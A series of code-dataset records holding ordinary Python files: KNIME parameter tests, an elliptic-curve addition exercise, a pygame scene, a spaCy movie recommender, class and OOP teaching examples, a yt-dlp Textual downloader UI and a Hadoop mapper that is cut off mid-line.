kp.extract_ui_schema(obj, DummyDialogCreationContext())\n expected = {\n \"type\": \"VerticalLayout\",\n \"elements\": [\n {\n \"type\": \"Section\",\n \"label\": \"Parameter group to be used for multiple descriptor instances.\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Control\",\n \"label\": \"Plain int param\",\n \"scope\": \"#/properties/model/properties/first_group/properties/first_param\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Second int param\",\n \"scope\": \"#/properties/model/properties/first_group/properties/second_param\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n {\n \"type\": \"Section\",\n \"label\": \"Parameter group to be used for multiple descriptor instances.\",\n \"options\": {},\n \"elements\": [\n {\n \"type\": \"Control\",\n \"label\": \"Plain int param\",\n \"scope\": \"#/properties/model/properties/second_group/properties/first_param\",\n \"options\": {\"format\": \"integer\"},\n },\n {\n \"type\": \"Control\",\n \"label\": \"Second int param\",\n \"scope\": \"#/properties/model/properties/second_group/properties/second_param\",\n \"options\": {\"format\": \"integer\"},\n },\n ],\n },\n ],\n }\n self.assertEqual(ui_schema, expected)\n\n def test_extract_description(self):\n expected = [\n {\n \"name\": \"Options\",\n \"description\": \"\",\n \"options\": [\n {\"name\": \"Int Parameter\", \"description\": \"An integer parameter\"},\n {\"name\": \"Double Parameter\", \"description\": \"A double parameter\"},\n {\"name\": \"String Parameter\", \"description\": \"A string parameter\"},\n {\n \"name\": \"Multiline String Parameter\",\n \"description\": \"A multiline string parameter\",\n },\n {\"name\": \"Boolean Parameter\", \"description\": \"A boolean parameter\"},\n {\n \"name\": \"Column Parameter\",\n \"description\": \"A column parameter\",\n },\n {\n \"name\": \"Multi Column Parameter\",\n \"description\": \"A multi column parameter\",\n },\n {\n \"name\": \"Full Multi Column Parameter\",\n \"description\": \"A full multi column parameter\",\n },\n ],\n },\n {\n \"name\": \"Primary Group\",\n \"description\": \"A parameter group which contains a parameter group as a subgroup, and sets a custom validator for a parameter.\",\n \"options\": [\n {\n \"name\": \"First Parameter\",\n \"description\": \"First parameter description\",\n },\n {\n \"name\": \"Second Parameter\",\n \"description\": \"Second parameter description\",\n },\n {\n \"name\": \"Internal int Parameter\",\n \"description\": \"Internal int parameter description\",\n },\n ],\n },\n ]\n\n description, use_tabs = kp.extract_parameter_descriptions(self.parameterized)\n\n self.assertTrue(use_tabs)\n self.assertEqual(description, expected)\n\n # Without a group -> only top level options\n expected = [\n {\"name\": \"Int Parameter\", \"description\": \"An integer parameter\"},\n {\"name\": \"Double Parameter\", \"description\": \"A double parameter\"},\n {\"name\": \"String Parameter\", \"description\": \"A string parameter\"},\n {\"name\": \"Boolean Parameter\", \"description\": \"A boolean parameter\"},\n {\"name\": \"Column Parameter\", \"description\": \"A column parameter\"},\n {\n \"name\": \"Multi Column Parameter\",\n \"description\": \"A multi column parameter\",\n },\n {\n \"name\": \"Full Multi Column Parameter\",\n \"description\": \"A full multi column parameter\",\n },\n ]\n description, use_tabs = kp.extract_parameter_descriptions(\n self.parameterized_without_group\n )\n self.assertFalse(use_tabs)\n self.assertEqual(description, expected)\n\n def test_extract_description_with_intendation(self):\n expected = [\n {\n \"description\": \"\\n Any Text\\n \\n\\n **Available options:**\\n\\n - Default: This is the default option, since additional options have not been provided.\\n\",\n \"name\": \"Indented Enum Parameter\",\n },\n {\n \"description\": \"\\n Any Text\\n \\n\\n **Available options:**\\n\\n - Default: This is the default option, since additional options have not been provided.\\n\",\n \"name\": \"Indented Enum Parameter\",\n },\n ]\n description, use_tabs = kp.extract_parameter_descriptions(\n self.parameterized_with_indented_docstring\n )\n\n self.assertEqual(description, expected)\n\n def test_inject_validates(self):\n pass # TODO\n # injection of custom parameter/parameter group validators can only be done\n # inside their \"parent\" class declaration\n\n ### Test versioning of node settings ####\n def test_extract_schema_with_version(self):\n for version in [\"0.1.0\", \"0.2.0\", \"0.3.0\"]:\n schema = kp.extract_schema(self.versioned_parameterized, version)\n expected = generate_versioned_schema_dict(extension_version=version)\n self.assertEqual(schema, expected)\n\n def test_version_parsing(self):\n # test default behaviour\n self.assertEqual(kp.Version.parse_version(None), kp.Version(0, 0, 0))\n\n self.assertEqual(\n kp.Version.parse_version(kp.Version.parse_version(None)),\n kp.Version(0, 0, 0),\n )\n\n self.assertEqual(kp.Version.parse_version(\"0.1.0\"), kp.Version(0, 1, 0))\n\n # test that incorrect formatting raises ValueError\n for version in [\n \"0.0.0.1\",\n \"0.0.a\",\n \"0.1.a\",\n \"0.1.0-alpha\",\n \"0.0-alpha.1\",\n \"1.-3.7.-5.2\",\n \".0.1\",\n \"a.b.c\",\n \"\",\n \"0\",\n \"...\",\n ]:\n with self.assertRaises(ValueError):\n kp.Version.parse_version(version)\n\n # check that comparing version works as expected\n self.assertTrue(kp.Version(0, 1, 0) > kp.Version(0, 0, 0))\n self.assertTrue(kp.Version(0, 1, 0) >= kp.Version(0, 0, 0))\n self.assertTrue(kp.Version(0, 0, 1) >= kp.Version(0, 0, 0))\n self.assertTrue(kp.Version(1, 1, 2) >= kp.Version(1, 1, 1))\n\n def test_determining_compatibility(self):\n # given the version of the extension that the node settings were saved with,\n # and the version of the installed extension, test identifying whether\n # we have a case of backward or forward compatibility\n\n cases = [\n # (saved_version, installed_version, saved_params)\n (\n \"0.2.0\",\n \"0.1.0\",\n generate_versioned_values_dict(extension_version=\"0.2.0\"),\n ),\n (\n \"0.1.0\",\n \"0.2.0\",\n generate_versioned_values_dict(extension_version=\"0.1.0\"),\n ),\n (\n \"0.1.0\",\n \"0.3.0\",\n generate_versioned_values_dict(extension_version=\"0.1.0\"),\n ),\n (\n \"0.2.0\",\n \"0.3.0\",\n generate_versioned_values_dict(extension_version=\"0.2.0\"),\n ),\n ]\n\n with self.assertLogs(level=\"DEBUG\") as context_manager:\n for saved_version, installed_version, saved_params in cases:\n kp.determine_compatability(\n self.versioned_parameterized,\n saved_version,\n installed_version,\n saved_params,\n )\n\n self.assertEqual(\n [\n # 0.2.0 -> 0.1.0: forward compatibility (not supported)\n \"ERROR:Python backend: The node was previously configured with a newer version of the extension, 0.2.0, while the current version is 0.1.0.\",\n \"ERROR:Python backend: The node might not work as expected without being reconfigured.\",\n # 0.1.0 -> 0.2.0: backward compatibility\n \"DEBUG:Python backend: The node was previously configured with an older version of the extension, 0.1.0, while the current version is 0.2.0.\",\n \"DEBUG:Python backend: The following parameters have since been added, and are configured with their default values:\",\n 'DEBUG:Python backend: - \"String Parameter\"',\n 'DEBUG:Python backend: - \"First Parameter\"',\n # 0.1.0 -> 0.3.0: backward compatibility\n \"DEBUG:Python backend: The node was previously configured with an older version of the extension, 0.1.0, while the current version is 0.3.0.\",\n \"DEBUG:Python backend: The following parameters have since been added, and are configured with their default values:\",\n 'DEBUG:Python backend: - \"String Parameter\"',\n 'DEBUG:Python backend: - \"Boolean Parameter\"',\n 'DEBUG:Python backend: - \"First Parameter\"',\n 'DEBUG:Python backend: - \"Second Parameter\"',\n # 0.2.0 -> 0.3.0: backward compatibility\n \"DEBUG:Python backend: The node was previously configured with an older version of the extension, 0.2.0, while the current version is 0.3.0.\",\n \"DEBUG:Python backend: The following parameters have since been added, and are configured with their default values:\",\n 'DEBUG:Python backend: - \"Boolean Parameter\"',\n 'DEBUG:Python backend: - \"Second Parameter\"',\n ],\n context_manager.output,\n )\n\n def test_custom_methods_in_parameter_groups(self):\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group.recursive_method(0), 10\n )\n\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group.middle_group.inner_group.inner_foo(),\n 4,\n )\n\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group.nested_method(),\n self.parameterized_with_custom_methods.outer_group.middle_group.inner_group.inner_foo(),\n )\n\n self.assertEqual(\n self.parameterized_with_custom_methods.outer_group._protected_method(),\n \"bar\",\n )\n\n # test that validation still works\n forbidden_params_inner = generate_values_dict_for_group_w_custom_method(\n inner_int_param2=3\n )\n forbidden_params_middle = generate_values_dict_for_group_w_custom_method(\n middle_int_param=10\n )\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(\n self.parameterized_with_custom_methods, forbidden_params_inner\n )\n\n with self.assertRaises(ValueError):\n kp.validate_parameters(\n self.parameterized_with_custom_methods, forbidden_params_middle\n )\n\n\nclass FullColumnSelectionTest(unittest.TestCase):\n def test_apply_manual_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number_double\", \"number_int\"],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.MANUAL)\n\n selection.manual_filter = kp.ManualFilterConfig()\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.manual_filter = kp.ManualFilterConfig(include_unknown_columns=False)\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.manual_filter = kp.ManualFilterConfig(\n include_unknown_columns=False, included=[\"string\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.manual_filter = kp.ManualFilterConfig(\n include_unknown_columns=True, included=[\"string\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.manual_filter = kp.ManualFilterConfig(\n include_unknown_columns=True, excluded=[\"string\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number_double\", \"number_int\"], filtered.column_names)\n\n def test_apply_regex_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number_double\", \"number_int\"],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.REGEX)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\".*\")\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(inverted=True, pattern=\".*\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\"Number\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number_double\", \"number_int\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number_double\", \"number_int\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, inverted=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n def test_apply_wildcard_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number[double]\", \"number[int]\"],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.WILDCARD)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\"*\")\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number[double]\", \"number[int]\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(inverted=True, pattern=\"*\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(pattern=\"Number\")\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, pattern=\"Number*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=True, pattern=\"Number\"\n )\n filtered = selection.apply(schema)\n self.assertEqual(\n [\"string\", \"number[double]\", \"number[int]\"], filtered.column_names\n )\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, inverted=True, pattern=\"Number*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=False, inverted=True, pattern=\"?umber*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=False, pattern=\"?umber*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=False, pattern=\"number[*]\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n selection.pattern_filter = kp.PatternFilterConfig(\n case_sensitive=True, inverted=False, pattern=\"number[*\"\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\", \"number[int]\"], filtered.column_names)\n\n def test_apply_type_filter(self):\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number[double]\", \"number[int]\"],\n [\n {\"preferred_value_type\": \"MyString\"},\n {\"preferred_value_type\": \"MyDouble\"},\n {\"preferred_value_type\": \"MyInt\"},\n ],\n )\n\n selection = kp.ColumnFilterConfig(mode=kp.ColumnFilterMode.TYPE)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyString\"], type_displays=[\"My String\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\"], filtered.column_names)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyDouble\"], type_displays=[\"My Double\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"number[double]\"], filtered.column_names)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"Random\"], type_displays=[\"Random\"]\n )\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names)\n\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyString\", \"MyDouble\"],\n type_displays=[\"My String\", \"My Double\"],\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"string\", \"number[double]\"], filtered.column_names)\n\n schema = ks.Schema.from_types(\n [ks.string(), ks.double(), ks.int32()],\n [\"string\", \"number[double]\", \"number[int]\"],\n # No metadata given\n )\n selection.type_filter = kp.TypeFilterConfig(\n selected_types=[\"MyString\", \"MyDouble\"],\n type_displays=[\"My String\", \"My Double\"],\n )\n with self.assertLogs() as log:\n filtered = selection.apply(schema)\n self.assertEqual([], filtered.column_names) # all columns will be dropped\n self.assertIn(\n \"Ignoring column 'string' because it does not have a 'preferred_value_type' set.\",\n log.output[0],\n )\n self.assertIn(\n \"Ignoring column 'number[double]' because it does not have a 'preferred_value_type' set.\",\n log.output[1],\n )\n self.assertIn(\n \"Ignoring column 'number[int]' because it does not have a 'preferred_value_type' set.\",\n log.output[2],\n )\n\n def test_apply_with_prefilter(self):\n selection = kp.ColumnFilterConfig(\n mode=kp.ColumnFilterMode.MANUAL, pre_filter=lambda c: c.name != \"bar\"\n )\n schema = ks.Schema.from_types([ks.string()] * 3, [\"foo\", \"bar\", \"baz\"])\n selection.manual_filter = kp.ManualFilterConfig(\n included=[\"foo\"], excluded=[\"baz\"], include_unknown_columns=True\n )\n filtered = selection.apply(schema)\n self.assertEqual([\"foo\"], filtered.column_names)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"knime/knime-python","sub_path":"org.knime.python3.nodes.tests/src/test/python/unittest/test_knime_parameter.py","file_name":"test_knime_parameter.py","file_ext":"py","file_size_in_byte":95644,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"76"} +{"seq_id":"34377381510","text":"def isin(a,b,p,P):\n if p == 0:\n return True\n x,y = p[0],p[1]\n value = y**2-x**3-a*x-b\n if value%P == 0:\n return True\n return False\n\ndef add_point(a,b,p,q,P):\n if not isin(a,b,p,P):\n return ValueError(\"{} is not in the curve\".format(p))\n if not isin(a,b,q,P):\n return ValueError(\"{} is not in the curve\".format(q))\n \n if p == 0:\n return q\n if q == 0:\n return p\n x1,y1,x2,y2 = p[0],p[1],q[0],q[1]\n if x1 == x2 and y1 == -y2:\n return 0\n lamb = 0\n if p!=q:\n lamb = (y2-y1)*pow((x2-x1),-1,P)\n else:\n lamb = (3*x1**2+a)*pow((2*y1),-1,P)\n x3 = lamb**2-x1-x2\n y3 = lamb*(x1-x3)-y1\n x3 %= P\n y3 %= P\n return [x3,y3]\na = 497\nb = 1768\nP = 9739\np = [493, 5564]\nq = [1539,4742]\nr = [4403,5202]\n","repo_name":"kogino-icepp/CTF","sub_path":"cryptohack/elliptic_curves/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27720535422","text":"import pygame\nfrom typing import List\nfrom player import Player\nfrom settings import GAME_SCENE_WIDTH, GAME_SCENE_HEIGHT\n\n\nclass GameScene:\n def __init__(self, players: List[Player]):\n self.scene_surface = pygame.Surface((GAME_SCENE_WIDTH, GAME_SCENE_HEIGHT))\n self.players = players\n\n def update(self, dt: float):\n for player in self.players:\n player.update(dt)\n\n\nclass Scene1(GameScene):\n def __init__(self, players: List[Player]):\n super().__init__(players)\n\n self.bg = pygame.Surface(self.scene_surface.get_size())\n\n ar = pygame.PixelArray(self.bg)\n maximum = self.bg.get_width() + self.bg.get_height()\n for x in range(self.bg.get_width()):\n for y in range(self.bg.get_height()):\n c = (x + y) / maximum * 255\n r, g, b = c, c, c\n ar[x, y] = (r, g, b)\n\n def update(self, dt: float):\n super().update(dt)\n self.scene_surface.fill(\"green\")\n self.scene_surface.blit(self.bg, (0, 0))\n for player in self.players:\n pygame.draw.rect(\n self.scene_surface, player.color, (player.pos[0], player.pos[1], 30, 30)\n )\n","repo_name":"brccabral/LocalMultiplayerCamerasPython","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2352065404","text":"from pathlib import Path\nimport spacy\nimport os\n\n# Load the spaCy model\nnlp = spacy.load('en_core_web_md')\n\ndef watch_next(desc):\n data_folder = os.path.dirname(os.path.abspath(__file__))\n file_to_open = os.path.join(data_folder, \"movies.txt\")\n \n with open(file_to_open, \"r\") as movies_data:\n data = movies_data.read()\n\n movies = data.split('\\n')\n lst = {}\n for token in movies:\n # print(token)\n token = nlp(token)\n \n result = token.similarity(desc)\n print()\n print(f\"output {result:.2f} \")\n lst[token.text] = result\n\n max_value = max(lst, key=lst.get)\n return max_value\n\ndescription = \"\"\"Will he save\ntheir world or destroy it? When the Hulk becomes too dangerous for the\nEarth, the Illuminati trick Hulk into a shuttle and launch him into space to a\nplanet where the Hulk can live in peace. Unfortunately, Hulk land on the\nplanet Sakaar where he is sold into slavery and trained as a gladiator.\"\"\"\n\nprint(watch_next(nlp(description)))\n","repo_name":"Simelweyinkosi1/Movie-reccomendation","sub_path":"watch_next/watch_next.py","file_name":"watch_next.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33896078640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 7 10:03:35 2020\n\n@author: nati1\n\n\"\"\"\n\n\n### Q1 ###\n\nclass student(object):\n def __init__(self, name, math):\n name_condition = name.split(\" \")\n assert len(name_condition) == 2, \"The name you have entered is not valid\"\n self.name = name\n assert type(math) == int and math <= 100 and math >= 0, \"Please enter integer type as math value\"\n self.math = math\n\n def get_name(self):\n return (self.name)\n\n def get_math(self):\n return self.math\n\n def __str__(self):\n math_grade = str(self.math)\n info = \"Student info:\\nName : \" + self.name + \"\\nMath test score :\" + str(math_grade)\n return (info)\n\n def __add__(self, s2):\n new_score = max(self.math, s2.math)\n self.math = s2.math = new_score\n if self.__class__ == eng_student and s2.__class__ != eng_student:\n phys1_grade = self.phys1\n s2 = eng_student(s2.name, s2.math, phys1_grade)\n elif s2.__class__ == eng_student and self.__class__ != eng_student:\n phys1_grade = s2.phys1\n self = eng_student(self.name, self.math, phys1_grade)\n\n return tuple((self.name, s2.name))\n\n\nclass eng_student(student):\n def __init__(self, name, math, phys1):\n student.__init__(self, name, math)\n self.phys1 = phys1\n\n\nNati = eng_student(\"Nati Iyov\", 73, 85)\nSagi = student(\"Sagi Krief\", 68)\n\nSagi + Nati\nprint(type(Sagi))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"LittleAndroidBunny/Python_Cheatsheet_Nohar_Batit","sub_path":"Class/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7310343203","text":"from typing import Literal\n\nfrom platformdirs import user_downloads_dir\n\nfrom textual.app import App, ComposeResult\nfrom textual import work\nfrom textual.reactive import reactive\nfrom textual.containers import (\n\tCenter\n)\nfrom textual.widgets import (\n\tStatic,\n\tLabel,\n\tInput,\n\tButton,\n\tSelect,\n\tLog\n)\n\nfrom _yt_dlp import YDL, FORMAT_EXTS, VIDEO_QUALITY\n\nMODE = {\n\t\"video\": \"video\",\n\t\"audio\": \"audio\"\n}\nMODE_TEXT = {\n\t\"video\": \"📹Video\",\n\t\"audio\": \"🔊Audio\"\n}\nclass Operation(Center):\n\t\"\"\"Main Widget to get the QueryBox settings\"\"\"\n\tmode = reactive(MODE[\"video\"])\n\n\tdef watch_mode(self, mode):\n\t\tself.query_one(\"#operation-audio-ext\").set_class(not(mode in MODE[\"audio\"]), \"hidden\")\n\t\tself.query_one(\"#operation-video-ext\").set_class(not(mode in MODE[\"video\"]), \"hidden\")\n\t\tself.query_one(\"#operation-video-quality\").set_class(not(mode in MODE[\"video\"]), \"hidden\")\n\n\tasync def on_button_pressed(self, event: Button.Pressed) -> None:\n\t\t\"\"\"The changer to the 'mode' variable\"\"\"\n\t\tbutton_id = event.button.id\n\t\tif button_id in MODE:\n\t\t\tself.mode = button_id\n\t\telse:\n\t\t\traise ValueError\n\n\tdef compose(self) -> None:\n\t\t# Top Operations\n\t\twith Static(id=\"operations\"):\n\t\t\tyield Button(MODE_TEXT[\"video\"], id=\"video\")\n\t\t\tyield Button(MODE_TEXT[\"audio\"], id=\"audio\")\n\n\t\twith Center():\n\t\t\t# Selectors\n\t\t\twith Static(id=\"operation\"):\n\t\t\t\tyield Select(\n\t\t\t\t\tlist(zip(FORMAT_EXTS[\"audio\"], FORMAT_EXTS[\"audio\"])),\n\t\t\t\t\tprompt=\"EXT Audio\", id=\"operation-audio-ext\")\n\t\t\t\tyield Select(\n\t\t\t\t\tlist(zip(FORMAT_EXTS[\"video\"], FORMAT_EXTS[\"video\"])),\n\t\t\t\t\tprompt=\"EXT Video\", id=\"operation-video-ext\")\n\t\t\t\tyield Select(\n\t\t\t\t\t[(item + \"p\", item) for item in VIDEO_QUALITY],\n\t\t\t\t\tprompt=\"Quality\", id=\"operation-video-quality\")\n\n\t\t\t# InputBox\n\t\t\twith Static(id=\"inputbox\"):\n\t\t\t\tyield Label(\"Insert a URL\", id=\"inputbox-log\")\n\t\t\t\tyield Input(\"\", placeholder=\"Search something...\", id=\"inputbox-input\")\n\t\t\t\t#yield Button(\"✅\", id=\"inputbox-confirm\")\n\nclass YDLApp(App):\n\tTITLE = \"YDL\"\n\tCSS_PATH = \"styles.tcss\"\n\tBINDINGS = [\n\t\t(\"d\", \"toggle_dark\", \"Toggle dark mode\")\n\t]\n\n\tdef compose(self) -> ComposeResult:\n\t\tyield Operation()\n\t\tyield Log(id=\"logger\")\n\n\tdef on_input_submitted(self, event: Input.Submitted) -> None:\n\t\tif event.input.id == \"inputbox-input\":\n\t\t\tself.start_download(event.input.value)\n\n\t@work(exclusive=True, thread=True)\n\tdef start_download(self, url: str) -> None:\n\t\tydl = YDL()\n\t\tmode = self.query_one(Operation).mode\n\n\t\tif mode == \"video\":\n\t\t\text = self.query_one(\"#operation-video-ext\").value\n\t\t\text_quality = self.query_one(\"#operation-video-quality\").value\n\t\t\tydl.download(\n\t\t\t\turl=url,\n\t\t\t\text=ext,\n\t\t\t\toutput_path=user_downloads_dir(),\n\t\t\t\tquality=ext_quality\n\t\t\t)\n\t\t\tself.query_one(\"#logger\").write_line(\"Video download completed!\")\n\t\telif mode == \"audio\":\n\t\t\text = self.query_one(\"#operation-audio-ext\").value\n\t\t\tydl.download(\n\t\t\t\turl=url,\n\t\t\t\text=ext,\n\t\t\t\toutput_path=user_downloads_dir()\n\t\t\t)\n\t\t\tself.query_one(\"#logger\").write_line(\"Audio download completed!\")\n\nif __name__ == \"__main__\":\n\tapp = YDLApp()\n\tapp.run()","repo_name":"Rikiub/media-dl","sub_path":"media_dl/textual_ui/bak/v2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28670422772","text":"from datetime import date\n\n\nclass Person:\n \"\"\"Class describing a person\n Person(name, date_of_birth) --> Person object\"\"\"\n MIN_YEAR = 1900 # class attribute\n count = 0\n\n def __init__(self, pname, dob):\n self.name = pname # instance attribute\n self.date_of_birth = dob\n self._increment_count()\n # Person.count += 1\n\n @property\n def date_of_birth(self): # getter\n return self._date_of_birth\n\n @date_of_birth.setter\n def date_of_birth(self, value): # setter\n if value.year < self.MIN_YEAR:\n raise Exception(f\"minimum year is {self.MIN_YEAR}\")\n self._date_of_birth = value\n\n @date_of_birth.deleter\n def date_of_birth(self): # deleter\n del self._date_of_birth\n\n @property\n def age(self):\n return self.compute_age(self.date_of_birth)\n\n # def __setattr__(self, key, value):\n # if key == 'date_of_birth':\n # if value.year < self.MIN_YEAR:\n # raise Exception(f\"minimum year is {self.MIN_YEAR}\")\n # super().__setattr__(key, value)\n\n def greet(self, greeting=\"hi\"): # instance methods\n print(f\"{greeting.capitalize()}! I am {self.name}.\")\n\n def __lt__(self, other):\n return self.date_of_birth > other.date_of_birth\n\n def __str__(self):\n return f\"{self.__class__.__name__} object (name={self.name})\"\n\n @classmethod\n def _increment_count(cls):\n cls.count += 1\n\n @staticmethod\n def compute_age(date_obj):\n diff = date.today() - date_obj\n return int(diff.days / 365.25)\n\n\nclass Student(Person):\n count = 0\n\n def __init__(self, name, date_of_birth, university):\n super().__init__(name, date_of_birth)\n self.university = university\n\n def greet(self, greeting=\"hello\"):\n print(f\"{greeting.capitalize()}! I am {self.name} and I study at {self.university}.\")\n\n def __str__(self):\n super_str = super().__str__()\n return super_str[:-1] + f\" univ={self.university}\" + super_str[-1]\n\n\nif __name__ == \"__main__\":\n print(Person.__doc__)\n p1 = Person(\"Ana\", date(2000, 4, 5))\n p2 = Person(\"Matei\", date(1985, 12, 25))\n print(p1, str(p1), repr(p1))\n\n # Attributes can be modified from outside the class\n p2.name = 'Andrei'\n print(p2.name, p2.date_of_birth)\n\n print(p1.MIN_YEAR is Person.MIN_YEAR)\n print(\"Person count:\", Person.count)\n\n p1.greet(\"hello\")\n p2.greet()\n\n # Can also be called as:\n Person.greet(p1, \"hello\")\n\n print('p1 is younger than p2:', p1 < p2)\n\n print(Person.compute_age(date(1800, 4, 8)))\n\n # Private/protected methods shouldn't be called from outside the class\n # Person._increment_count()\n # print(\"Person count:\", Person.count)\n\n # Magic methods can be called from outside the class\n print(p1.__str__())\n # But we should rather call use the built-in function or operator that calls\n # them under the hood\n print(str(p1))\n\n invalid_date = date(1898, 4, 2)\n try:\n p3 = Person(\"Ion\", invalid_date)\n except Exception:\n pass\n\n try:\n p1.date_of_birth = invalid_date\n except Exception:\n pass\n print(p1.date_of_birth)\n\n # del p1.date_of_birth\n # print(p1.date_of_birth)\n\n print(f\"{p1.name} is {p1.age} years old.\")\n\n s1 = Student(\"Ion Marinescu\", date(2001, 8, 2), \"CSIE\")\n s1.greet()\n print(str(s1))\n\n print(\"Person count:\", Person.count)\n print(\"Student count:\", Student.count)\n","repo_name":"fpax222/Fpax","sub_path":"examples/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32826739010","text":"#!/usr/bin/python\n'''\n@Author:gm_xiong@pku.edu.cn\n'''\nimport sys,json,time,traceback,os\nimport random\n\ndef trans_to_time(ss):\n try:\n return time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(float(ss)))\n except Exception as err:\n #traceback.print_exc()\n return 'time error: '+str(err)\n\nfor line in sys.stdin:\n\n #line = line.replace(\"\\\"\",'')\n\n data_dict = json.loads(line.replace(\" \",\"\"))\n\n sort_key_list = sorted(data_dict) #这是key组成的list\n sort_value_list = sorted(data_dict.values()) #这是values组成的list\n \n time_first = trans_to_time(sort_key_list[0])\n time_last = trans_to_time(sort_key_list[-1])\n\n null_value = sort_value_list.count(\"\")\n\n #Hadoop环境使用\n #filename = os.environ[\"mapreduce_map_input_file\"]\n\n #本地测试使用\n filename = \"filename_test_\"+str(random.randint(0,999))\n\n\n print ('%s_len\\t%s'%(filename,str(len(data_dict))))\n print 